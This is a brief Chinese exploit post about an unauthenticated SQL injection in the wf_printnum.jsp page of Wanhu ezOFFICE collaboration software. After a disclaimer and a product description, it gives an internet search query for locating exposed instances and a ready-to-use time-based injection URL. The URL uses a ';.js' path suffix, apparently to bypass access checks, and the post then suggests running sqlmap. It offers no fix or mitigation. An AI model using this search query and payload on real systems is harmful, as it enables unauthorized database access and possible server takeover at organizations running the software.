声明:
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
简介
万户EZOFFICE是一款办公软件,由中国万户网络科技有限公司开发和提供。该软件提供了一系列办公管理工具,包括文档管理、协作编辑、任务管理、日程安排、邮件通讯等功能,旨在提高团队的协作效率和工作效率
漏洞描述
万户ezOFFICE-wf_printnum.jsp存在SQL注入漏洞存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限
资产搜索
app="万户ezOFFICE协同管理平台"
漏洞复现
http://127.0.0.1/defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27
sqlmap跑一下
